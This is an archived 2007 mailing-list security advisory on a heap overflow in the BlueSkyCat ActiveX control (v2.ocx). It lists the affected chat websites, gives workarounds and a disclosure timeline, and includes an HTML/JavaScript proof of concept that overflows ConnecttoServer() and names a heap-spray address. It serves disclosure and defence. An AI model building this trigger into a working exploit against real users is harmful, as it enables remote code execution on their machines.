Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security VulnWatch
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

CAL-20070730-1 BlueSkyCat ActiveX Remote Heap Overflow vulnerability

from [Code Audit Labs] Network Security [Permanent Link]
Subject: CAL-20070730-1 BlueSkyCat ActiveX Remote Heap Overflow vulnerability
Date: Tue, 31 Jul 2007 08:36:11 +0800 
  CAL-20070730-1 BlueSkyCat ActiveX Remote Heap Overflow vulnerability

BACKGROUND:
===========

  BlueSkychat is a professional voice and video chat software widely used
by large chat websites in china.


DESCRIPTION:
============

  Code Audit Labs Code Audit for BlueSkyCat ActiveX Control and discovered
a vulnerability .

Remote exploitation of a buffer overflow in an ActiveX control distributed
with Bluesky.cn could allow for the execution of arbitrary code.

  When Blueskychat are installed, they register the following ActiveX
control on the system:

  ProgId: V2.V2Ctrl.1
  ClassId: 2EA6D939-4445-43F1-A12B-8CB3DDA8B855
  File: v2.ocx

  This control contains a buffer overflow in its ConnecttoServer() method.

  This is a clent side vulnerability. So the clients of following chat
servers which install the affected BlueSkyCat software are affected.
bliao         http://www.bliao.com
qqliao        http://www.qqliao.com
7liao         http://www.7liao.com
haoliao       http://www.haoliao.net
51liao        http://chat.51liao.net
heshang       http://www.heshang.net
xicn          http://vchat.xicn.net
CN104         http://www.cn104.com
liao-tian     http://www.liao-tian.com
aliao         http://www.aliao.net
kuailiao      http://www.kuailiao.com
mtliao        http://www.mtliao.com
pj0427        http://www.pj0427.com
uighur        http://chat.uighur.cn
wmliao        http://www.wmliao.com


CVE:
====
We request a CVE number to assign to this vulnerability.


Affected version:
================
v2.ocx  version 8.1.2.0 and prior


vendor:
=======
BlueSky http://www.bluesky.cn/


POC:
========
<html>
<head>
<OBJECT ID="com" CLASSID="CLSID:{2EA6D939-4445-43F1-A12B-8CB3DDA8B855}">
</OBJECT>
</head>
<body>
<SCRIPT language="javascript">

function ClickForRunCalc()
{
    var heapSprayToAddress = 0x0d0d0d0d;

    var payLoadCode = "A" ;
    while (payLoadCode.length <= 10000) payLoadCode+='A';
    com.ConnecttoServer("1",payLoadCode,"3","4","5");
}
</script>
<button onclick="javascript:ClickForRunCalc();">ClickForRunCalc</button>
</body>
</html>


Code Audit Labs Suggestion
==========================
for vendor:
  Do a full coverage Code Audit or Code Review

for client:
The following workarounds are available for this vulnerability:
    * Disable Active Scripting
    * Unregister the vulnerable control
    * Set the killbit for the vulnerable control
    * or update the software from http://www.bluesky.cn


DISCLOSURE TIMELINE:
====================
1: 2007-07-29 notice vendor (mail to blueskychat@gmail.com)
2: 2007-07-29 the vendor reply "thank,had fixed it".
3: 2007-07-30 we check it out, in fact,the websites which install the
  software did not almost all be updated,send mail to vendor again.
4: 2007-07-31 release this report


About Us:
=========
Code Audit Labs secure your software,provide Professional include source
code audit and binary code audit service.
Code Audit Labs:" You create value for customer,We protect your value"
http://www.VulnHunt.com


Original LINK:
==============

1: http://www.vulnhunt.com/advisories/CAL-20070730-1_BlueSkyCat_v2.ocx_ActiveX_remote_heap_overflow_vulnerability_en.txt
2: http://CodeAudit.blogspot.com

EOF


--
Code Audit Labs
http://www.vulnhunt.com/

[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • CAL-20070730-1 BlueSkyCat ActiveX Remote Heap Overflow vulnerability, Code Audit Labs <=
Previous by Date:  [Full-disclosure] rPSA-2007-0151-1 gvim vim vim-minimal, rPath Update Announcements
Next by Date:  [VulnWatch] ASA-2007-018: Resource exhaustion vulnerability in IAX2 channel driver, Security Response Team
Previous by Thread:  [Full-disclosure] rPSA-2007-0151-1 gvim vim vim-minimal, rPath Update Announcements
Next by Thread:  [VulnWatch] ASA-2007-018: Resource exhaustion vulnerability in IAX2 channel driver, Security Response Team
Indexes:  [Date] [Thread] [Top] [All Lists]